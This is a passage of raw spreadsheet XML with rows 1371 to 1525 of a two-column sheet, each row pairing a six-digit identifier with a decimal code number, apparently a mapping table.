    <row r="1371" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1371" s="5">
        <v>500119</v>
      </c>
      <c r="B1371" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="1372" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1372" s="5">
        <v>500119</v>
      </c>
      <c r="B1372" s="3">
        <v>901003.00100000005</v>
      </c>
    </row>
    <row r="1373" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1373" s="5">
        <v>500119</v>
      </c>
      <c r="B1373" s="3">
        <v>901018</v>
      </c>
    </row>
    <row r="1374" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1374" s="5">
        <v>500119</v>
      </c>
      <c r="B1374" s="3">
        <v>901489</v>
      </c>
    </row>
    <row r="1375" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1375" s="5">
        <v>500119</v>
      </c>
      <c r="B1375" s="3">
        <v>901007</v>
      </c>
    </row>
    <row r="1376" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1376" s="5">
        <v>500119</v>
      </c>
      <c r="B1376" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="1377" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1377" s="5">
        <v>500119</v>
      </c>
      <c r="B1377" s="3">
        <v>901078.00199999998</v>
      </c>
    </row>
    <row r="1378" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1378" s="5">
        <v>500119</v>
      </c>
      <c r="B1378" s="3">
        <v>901047</v>
      </c>
    </row>
    <row r="1379" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1379" s="5">
        <v>500004</v>
      </c>
      <c r="B1379" s="3">
        <v>901087.00100000005</v>
      </c>
    </row>
    <row r="1380" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1380" s="5">
        <v>500004</v>
      </c>
      <c r="B1380" s="3">
        <v>901087.00199999998</v>
      </c>
    </row>
    <row r="1381" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1381" s="5">
        <v>500004</v>
      </c>
      <c r="B1381" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="1382" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1382" s="5">
        <v>500004</v>
      </c>
      <c r="B1382" s="3">
        <v>901071.00399999996</v>
      </c>
    </row>
    <row r="1383" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1383" s="5">
        <v>500004</v>
      </c>
      <c r="B1383" s="3">
        <v>901560</v>
      </c>
    </row>
    <row r="1384" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1384" s="5">
        <v>500004</v>
      </c>
      <c r="B1384" s="3">
        <v>901560.00100000005</v>
      </c>
    </row>
    <row r="1385" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1385" s="5">
        <v>500004</v>
      </c>
      <c r="B1385" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="1386" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1386" s="5">
        <v>500004</v>
      </c>
      <c r="B1386" s="3">
        <v>901059</v>
      </c>
    </row>
    <row r="1387" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1387" s="5">
        <v>500004</v>
      </c>
      <c r="B1387" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="1388" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1388" s="5">
        <v>500004</v>
      </c>
      <c r="B1388" s="3">
        <v>901543.00300000003</v>
      </c>
    </row>
    <row r="1389" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1389" s="5">
        <v>500004</v>
      </c>
      <c r="B1389" s="3">
        <v>901213.00199999998</v>
      </c>
    </row>
    <row r="1390" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1390" s="5">
        <v>500004</v>
      </c>
      <c r="B1390" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="1391" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1391" s="5">
        <v>500004</v>
      </c>
      <c r="B1391" s="3">
        <v>901114.00199999998</v>
      </c>
    </row>
    <row r="1392" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1392" s="5">
        <v>500004</v>
      </c>
      <c r="B1392" s="3">
        <v>901041</v>
      </c>
    </row>
    <row r="1393" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1393" s="5">
        <v>500004</v>
      </c>
      <c r="B1393" s="3">
        <v>901133</v>
      </c>
    </row>
    <row r="1394" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1394" s="5">
        <v>500004</v>
      </c>
      <c r="B1394" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="1395" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1395" s="5">
        <v>500004</v>
      </c>
      <c r="B1395" s="3">
        <v>901056.00100000005</v>
      </c>
    </row>
    <row r="1396" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1396" s="5">
        <v>500004</v>
      </c>
      <c r="B1396" s="3">
        <v>901036.00199999998</v>
      </c>
    </row>
    <row r="1397" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1397" s="5">
        <v>500004</v>
      </c>
      <c r="B1397" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="1398" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1398" s="5">
        <v>500004</v>
      </c>
      <c r="B1398" s="3">
        <v>901003.00100000005</v>
      </c>
    </row>
    <row r="1399" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1399" s="5">
        <v>500004</v>
      </c>
      <c r="B1399" s="3">
        <v>901003.00199999998</v>
      </c>
    </row>
    <row r="1400" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1400" s="5">
        <v>500004</v>
      </c>
      <c r="B1400" s="3">
        <v>901003.00399999996</v>
      </c>
    </row>
    <row r="1401" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1401" s="5">
        <v>500004</v>
      </c>
      <c r="B1401" s="3">
        <v>901069.00199999998</v>
      </c>
    </row>
    <row r="1402" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1402" s="5">
        <v>500004</v>
      </c>
      <c r="B1402" s="3">
        <v>901057</v>
      </c>
    </row>
    <row r="1403" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1403" s="5">
        <v>500004</v>
      </c>
      <c r="B1403" s="3">
        <v>901021.00199999998</v>
      </c>
    </row>
    <row r="1404" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1404" s="5">
        <v>500004</v>
      </c>
      <c r="B1404" s="3">
        <v>901018</v>
      </c>
    </row>
    <row r="1405" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1405" s="5">
        <v>500004</v>
      </c>
      <c r="B1405" s="3">
        <v>901558.00100000005</v>
      </c>
    </row>
    <row r="1406" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1406" s="5">
        <v>500004</v>
      </c>
      <c r="B1406" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="1407" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1407" s="5">
        <v>500004</v>
      </c>
      <c r="B1407" s="3">
        <v>901016</v>
      </c>
    </row>
    <row r="1408" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1408" s="5">
        <v>500004</v>
      </c>
      <c r="B1408" s="3">
        <v>901049</v>
      </c>
    </row>
    <row r="1409" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1409" s="5">
        <v>500004</v>
      </c>
      <c r="B1409" s="3">
        <v>901007</v>
      </c>
    </row>
    <row r="1410" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1410" s="5">
        <v>500004</v>
      </c>
      <c r="B1410" s="3">
        <v>901569.00199999998</v>
      </c>
    </row>
    <row r="1411" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1411" s="5">
        <v>500094</v>
      </c>
      <c r="B1411" s="3">
        <v>901583.00100000005</v>
      </c>
    </row>
    <row r="1412" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1412" s="5">
        <v>500094</v>
      </c>
      <c r="B1412" s="3">
        <v>901557</v>
      </c>
    </row>
    <row r="1413" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1413" s="5">
        <v>500094</v>
      </c>
      <c r="B1413" s="3">
        <v>901071.00199999998</v>
      </c>
    </row>
    <row r="1414" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1414" s="5">
        <v>500094</v>
      </c>
      <c r="B1414" s="3">
        <v>901071.00300000003</v>
      </c>
    </row>
    <row r="1415" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1415" s="5">
        <v>500094</v>
      </c>
      <c r="B1415" s="3">
        <v>901560.00300000003</v>
      </c>
    </row>
    <row r="1416" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1416" s="5">
        <v>500094</v>
      </c>
      <c r="B1416" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="1417" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1417" s="5">
        <v>500094</v>
      </c>
      <c r="B1417" s="3">
        <v>901176</v>
      </c>
    </row>
    <row r="1418" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1418" s="5">
        <v>500094</v>
      </c>
      <c r="B1418" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="1419" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1419" s="5">
        <v>500094</v>
      </c>
      <c r="B1419" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="1420" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1420" s="5">
        <v>500094</v>
      </c>
      <c r="B1420" s="3">
        <v>901059.00600000005</v>
      </c>
    </row>
    <row r="1421" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1421" s="5">
        <v>500094</v>
      </c>
      <c r="B1421" s="3">
        <v>901059.00699999998</v>
      </c>
    </row>
    <row r="1422" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1422" s="5">
        <v>500094</v>
      </c>
      <c r="B1422" s="3">
        <v>901586.00199999998</v>
      </c>
    </row>
    <row r="1423" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1423" s="5">
        <v>500094</v>
      </c>
      <c r="B1423" s="3">
        <v>901543.00300000003</v>
      </c>
    </row>
    <row r="1424" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1424" s="5">
        <v>500094</v>
      </c>
      <c r="B1424" s="3">
        <v>901555.00300000003</v>
      </c>
    </row>
    <row r="1425" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1425" s="5">
        <v>500094</v>
      </c>
      <c r="B1425" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="1426" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1426" s="5">
        <v>500094</v>
      </c>
      <c r="B1426" s="3">
        <v>901074.00100000005</v>
      </c>
    </row>
    <row r="1427" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1427" s="5">
        <v>500094</v>
      </c>
      <c r="B1427" s="3">
        <v>901587</v>
      </c>
    </row>
    <row r="1428" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1428" s="5">
        <v>500094</v>
      </c>
      <c r="B1428" s="3">
        <v>901114.00300000003</v>
      </c>
    </row>
    <row r="1429" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1429" s="5">
        <v>500094</v>
      </c>
      <c r="B1429" s="3">
        <v>901546.00100000005</v>
      </c>
    </row>
    <row r="1430" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1430" s="5">
        <v>500094</v>
      </c>
      <c r="B1430" s="3">
        <v>901041</v>
      </c>
    </row>
    <row r="1431" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1431" s="5">
        <v>500094</v>
      </c>
      <c r="B1431" s="3">
        <v>901133</v>
      </c>
    </row>
    <row r="1432" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1432" s="5">
        <v>500094</v>
      </c>
      <c r="B1432" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="1433" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1433" s="5">
        <v>500094</v>
      </c>
      <c r="B1433" s="3">
        <v>901589.00199999998</v>
      </c>
    </row>
    <row r="1434" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1434" s="5">
        <v>500094</v>
      </c>
      <c r="B1434" s="3">
        <v>901562.00100000005</v>
      </c>
    </row>
    <row r="1435" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1435" s="5">
        <v>500094</v>
      </c>
      <c r="B1435" s="3">
        <v>901562.00399999996</v>
      </c>
    </row>
    <row r="1436" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1436" s="5">
        <v>500094</v>
      </c>
      <c r="B1436" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="1437" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1437" s="5">
        <v>500094</v>
      </c>
      <c r="B1437" s="3">
        <v>901070.00600000005</v>
      </c>
    </row>
    <row r="1438" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1438" s="5">
        <v>500094</v>
      </c>
      <c r="B1438" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="1439" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1439" s="5">
        <v>500094</v>
      </c>
      <c r="B1439" s="3">
        <v>901056.00100000005</v>
      </c>
    </row>
    <row r="1440" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1440" s="5">
        <v>500094</v>
      </c>
      <c r="B1440" s="3">
        <v>901036.00399999996</v>
      </c>
    </row>
    <row r="1441" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1441" s="5">
        <v>500094</v>
      </c>
      <c r="B1441" s="3">
        <v>901112</v>
      </c>
    </row>
    <row r="1442" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1442" s="5">
        <v>500094</v>
      </c>
      <c r="B1442" s="3">
        <v>901040</v>
      </c>
    </row>
    <row r="1443" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1443" s="5">
        <v>500094</v>
      </c>
      <c r="B1443" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="1444" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1444" s="5">
        <v>500094</v>
      </c>
      <c r="B1444" s="3">
        <v>901027.00199999998</v>
      </c>
    </row>
    <row r="1445" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1445" s="5">
        <v>500094</v>
      </c>
      <c r="B1445" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="1446" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1446" s="5">
        <v>500094</v>
      </c>
      <c r="B1446" s="3">
        <v>901003.00100000005</v>
      </c>
    </row>
    <row r="1447" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1447" s="5">
        <v>500094</v>
      </c>
      <c r="B1447" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="1448" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1448" s="5">
        <v>500094</v>
      </c>
      <c r="B1448" s="3">
        <v>901566.00199999998</v>
      </c>
    </row>
    <row r="1449" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1449" s="5">
        <v>500094</v>
      </c>
      <c r="B1449" s="3">
        <v>901598.00300000003</v>
      </c>
    </row>
    <row r="1450" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1450" s="5">
        <v>500094</v>
      </c>
      <c r="B1450" s="3">
        <v>901055</v>
      </c>
    </row>
    <row r="1451" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1451" s="5">
        <v>500094</v>
      </c>
      <c r="B1451" s="3">
        <v>901219</v>
      </c>
    </row>
    <row r="1452" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1452" s="5">
        <v>500094</v>
      </c>
      <c r="B1452" s="3">
        <v>901021.00100000005</v>
      </c>
    </row>
    <row r="1453" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1453" s="5">
        <v>500094</v>
      </c>
      <c r="B1453" s="3">
        <v>901593.00100000005</v>
      </c>
    </row>
    <row r="1454" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1454" s="5">
        <v>500094</v>
      </c>
      <c r="B1454" s="3">
        <v>901505.00300000003</v>
      </c>
    </row>
    <row r="1455" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1455" s="5">
        <v>500094</v>
      </c>
      <c r="B1455" s="3">
        <v>901218.005</v>
      </c>
    </row>
    <row r="1456" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1456" s="5">
        <v>500094</v>
      </c>
      <c r="B1456" s="3">
        <v>901553.00199999998</v>
      </c>
    </row>
    <row r="1457" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1457" s="5">
        <v>500094</v>
      </c>
      <c r="B1457" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="1458" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1458" s="5">
        <v>500094</v>
      </c>
      <c r="B1458" s="3">
        <v>901552.00100000005</v>
      </c>
    </row>
    <row r="1459" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1459" s="5">
        <v>500094</v>
      </c>
      <c r="B1459" s="3">
        <v>901550.00199999998</v>
      </c>
    </row>
    <row r="1460" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1460" s="5">
        <v>500094</v>
      </c>
      <c r="B1460" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="1461" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1461" s="5">
        <v>500094</v>
      </c>
      <c r="B1461" s="3">
        <v>901078.00300000003</v>
      </c>
    </row>
    <row r="1462" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1462" s="5">
        <v>500032</v>
      </c>
      <c r="B1462" s="3">
        <v>901134.00199999998</v>
      </c>
    </row>
    <row r="1463" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1463" s="5">
        <v>500032</v>
      </c>
      <c r="B1463" s="3">
        <v>901098</v>
      </c>
    </row>
    <row r="1464" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1464" s="5">
        <v>500032</v>
      </c>
      <c r="B1464" s="3">
        <v>901583.00100000005</v>
      </c>
    </row>
    <row r="1465" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1465" s="5">
        <v>500032</v>
      </c>
      <c r="B1465" s="3">
        <v>901583.00600000005</v>
      </c>
    </row>
    <row r="1466" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1466" s="5">
        <v>500032</v>
      </c>
      <c r="B1466" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="1467" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1467" s="5">
        <v>500032</v>
      </c>
      <c r="B1467" s="3">
        <v>901010</v>
      </c>
    </row>
    <row r="1468" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1468" s="5">
        <v>500032</v>
      </c>
      <c r="B1468" s="3">
        <v>901560</v>
      </c>
    </row>
    <row r="1469" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1469" s="5">
        <v>500032</v>
      </c>
      <c r="B1469" s="3">
        <v>901560.00199999998</v>
      </c>
    </row>
    <row r="1470" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1470" s="5">
        <v>500032</v>
      </c>
      <c r="B1470" s="3">
        <v>901560.00300000003</v>
      </c>
    </row>
    <row r="1471" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1471" s="5">
        <v>500032</v>
      </c>
      <c r="B1471" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="1472" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1472" s="5">
        <v>500032</v>
      </c>
      <c r="B1472" s="3">
        <v>901547.00899999996</v>
      </c>
    </row>
    <row r="1473" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1473" s="5">
        <v>500032</v>
      </c>
      <c r="B1473" s="3">
        <v>901110.00300000003</v>
      </c>
    </row>
    <row r="1474" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1474" s="5">
        <v>500032</v>
      </c>
      <c r="B1474" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="1475" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1475" s="5">
        <v>500032</v>
      </c>
      <c r="B1475" s="3">
        <v>901543.00300000003</v>
      </c>
    </row>
    <row r="1476" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1476" s="5">
        <v>500032</v>
      </c>
      <c r="B1476" s="3">
        <v>901485</v>
      </c>
    </row>
    <row r="1477" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1477" s="5">
        <v>500032</v>
      </c>
      <c r="B1477" s="3">
        <v>901132.00100000005</v>
      </c>
    </row>
    <row r="1478" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1478" s="5">
        <v>500032</v>
      </c>
      <c r="B1478" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="1479" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1479" s="5">
        <v>500032</v>
      </c>
      <c r="B1479" s="3">
        <v>901001.00300000003</v>
      </c>
    </row>
    <row r="1480" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1480" s="5">
        <v>500032</v>
      </c>
      <c r="B1480" s="3">
        <v>901074.00100000005</v>
      </c>
    </row>
    <row r="1481" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1481" s="5">
        <v>500032</v>
      </c>
      <c r="B1481" s="3">
        <v>901491.00100000005</v>
      </c>
    </row>
    <row r="1482" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1482" s="5">
        <v>500032</v>
      </c>
      <c r="B1482" s="3">
        <v>901587.00100000005</v>
      </c>
    </row>
    <row r="1483" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1483" s="5">
        <v>500032</v>
      </c>
      <c r="B1483" s="3">
        <v>901561.00100000005</v>
      </c>
    </row>
    <row r="1484" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1484" s="5">
        <v>500032</v>
      </c>
      <c r="B1484" s="3">
        <v>901561.00199999998</v>
      </c>
    </row>
    <row r="1485" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1485" s="5">
        <v>500032</v>
      </c>
      <c r="B1485" s="3">
        <v>901189</v>
      </c>
    </row>
    <row r="1486" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1486" s="5">
        <v>500032</v>
      </c>
      <c r="B1486" s="3">
        <v>901573.00100000005</v>
      </c>
    </row>
    <row r="1487" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1487" s="5">
        <v>500032</v>
      </c>
      <c r="B1487" s="3">
        <v>901048.00300000003</v>
      </c>
    </row>
    <row r="1488" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1488" s="5">
        <v>500032</v>
      </c>
      <c r="B1488" s="3">
        <v>901041</v>
      </c>
    </row>
    <row r="1489" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1489" s="5">
        <v>500032</v>
      </c>
      <c r="B1489" s="3">
        <v>901203</v>
      </c>
    </row>
    <row r="1490" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1490" s="5">
        <v>500032</v>
      </c>
      <c r="B1490" s="3">
        <v>901008</v>
      </c>
    </row>
    <row r="1491" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1491" s="5">
        <v>500032</v>
      </c>
      <c r="B1491" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="1492" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1492" s="5">
        <v>500032</v>
      </c>
      <c r="B1492" s="3">
        <v>901564.00100000005</v>
      </c>
    </row>
    <row r="1493" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1493" s="5">
        <v>500032</v>
      </c>
      <c r="B1493" s="3">
        <v>901562.00100000005</v>
      </c>
    </row>
    <row r="1494" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1494" s="5">
        <v>500032</v>
      </c>
      <c r="B1494" s="3">
        <v>901562.00399999996</v>
      </c>
    </row>
    <row r="1495" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1495" s="5">
        <v>500032</v>
      </c>
      <c r="B1495" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="1496" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1496" s="5">
        <v>500032</v>
      </c>
      <c r="B1496" s="3">
        <v>901070.00600000005</v>
      </c>
    </row>
    <row r="1497" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1497" s="5">
        <v>500032</v>
      </c>
      <c r="B1497" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="1498" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1498" s="5">
        <v>500032</v>
      </c>
      <c r="B1498" s="3">
        <v>901056.00100000005</v>
      </c>
    </row>
    <row r="1499" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1499" s="5">
        <v>500032</v>
      </c>
      <c r="B1499" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="1500" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1500" s="5">
        <v>500032</v>
      </c>
      <c r="B1500" s="3">
        <v>901571</v>
      </c>
    </row>
    <row r="1501" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1501" s="5">
        <v>500032</v>
      </c>
      <c r="B1501" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="1502" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1502" s="5">
        <v>500032</v>
      </c>
      <c r="B1502" s="3">
        <v>901588.00399999996</v>
      </c>
    </row>
    <row r="1503" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1503" s="5">
        <v>500032</v>
      </c>
      <c r="B1503" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="1504" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1504" s="5">
        <v>500032</v>
      </c>
      <c r="B1504" s="3">
        <v>901542.00300000003</v>
      </c>
    </row>
    <row r="1505" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1505" s="5">
        <v>500032</v>
      </c>
      <c r="B1505" s="3">
        <v>901057</v>
      </c>
    </row>
    <row r="1506" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1506" s="5">
        <v>500032</v>
      </c>
      <c r="B1506" s="3">
        <v>901055.00100000005</v>
      </c>
    </row>
    <row r="1507" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1507" s="5">
        <v>500032</v>
      </c>
      <c r="B1507" s="3">
        <v>901090.00199999998</v>
      </c>
    </row>
    <row r="1508" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1508" s="5">
        <v>500032</v>
      </c>
      <c r="B1508" s="3">
        <v>901012</v>
      </c>
    </row>
    <row r="1509" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1509" s="5">
        <v>500032</v>
      </c>
      <c r="B1509" s="3">
        <v>901021.00100000005</v>
      </c>
    </row>
    <row r="1510" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1510" s="5">
        <v>500032</v>
      </c>
      <c r="B1510" s="3">
        <v>901021.00199999998</v>
      </c>
    </row>
    <row r="1511" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1511" s="5">
        <v>500032</v>
      </c>
      <c r="B1511" s="3">
        <v>901489</v>
      </c>
    </row>
    <row r="1512" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1512" s="5">
        <v>500032</v>
      </c>
      <c r="B1512" s="3">
        <v>901218.00100000005</v>
      </c>
    </row>
    <row r="1513" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1513" s="5">
        <v>500032</v>
      </c>
      <c r="B1513" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="1514" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1514" s="5">
        <v>500032</v>
      </c>
      <c r="B1514" s="3">
        <v>901016</v>
      </c>
    </row>
    <row r="1515" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1515" s="5">
        <v>500032</v>
      </c>
      <c r="B1515" s="3">
        <v>901033</v>
      </c>
    </row>
    <row r="1516" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1516" s="5">
        <v>500032</v>
      </c>
      <c r="B1516" s="3">
        <v>901529</v>
      </c>
    </row>
    <row r="1517" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1517" s="5">
        <v>500032</v>
      </c>
      <c r="B1517" s="3">
        <v>901124</v>
      </c>
    </row>
    <row r="1518" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1518" s="5">
        <v>500032</v>
      </c>
      <c r="B1518" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="1519" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1519" s="5">
        <v>500032</v>
      </c>
      <c r="B1519" s="3">
        <v>901047</v>
      </c>
    </row>
    <row r="1520" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1520" s="5">
        <v>500077</v>
      </c>
      <c r="B1520" s="3">
        <v>901110.00300000003</v>
      </c>
    </row>
    <row r="1521" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1521" s="5">
        <v>500077</v>
      </c>
      <c r="B1521" s="3">
        <v>901059.00699999998</v>
      </c>
    </row>
    <row r="1522" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1522" s="5">
        <v>500077</v>
      </c>
      <c r="B1522" s="3">
        <v>901136.00100000005</v>
      </c>
    </row>
    <row r="1523" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1523" s="5">
        <v>500077</v>
      </c>
      <c r="B1523" s="3">
        <v>901555</v>
      </c>
    </row>
    <row r="1524" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1524" s="5">
        <v>500077</v>
      </c>
      <c r="B1524" s="3">
        <v>901555.00300000003</v>
      </c>
    </row>
    <row r="1525" spans="1:2" x14ac:dyDescent="0.25">
